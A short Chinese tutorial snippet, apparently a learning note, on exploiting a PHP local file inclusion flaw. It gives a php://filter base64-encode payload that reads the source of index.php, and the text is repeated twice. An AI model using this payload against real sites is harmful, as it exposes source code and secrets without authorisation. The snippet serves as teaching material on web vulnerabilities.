学习链接:/wh4am1/p/6542398.html
发现地址后面的参数直接使用的文件包含。 ?file=show.php
为了查看index.php的源文件, 可以使用下面的命令:
rlfi.php ?language=php://filter/read=convert.base64-encode/resource=index.php
这样就得到了 index.php的base64加密后的值,解密即可。
时间:2022-03-14 12:03:14
发现地址后面的参数直接使用的文件包含。 ?file=show.php
为了查看index.php的源文件, 可以使用下面的命令:
rlfi.php ?language=php://filter/read=convert.base64-encode/resource=index.php
这样就得到了 index.php的base64加密后的值,解密即可。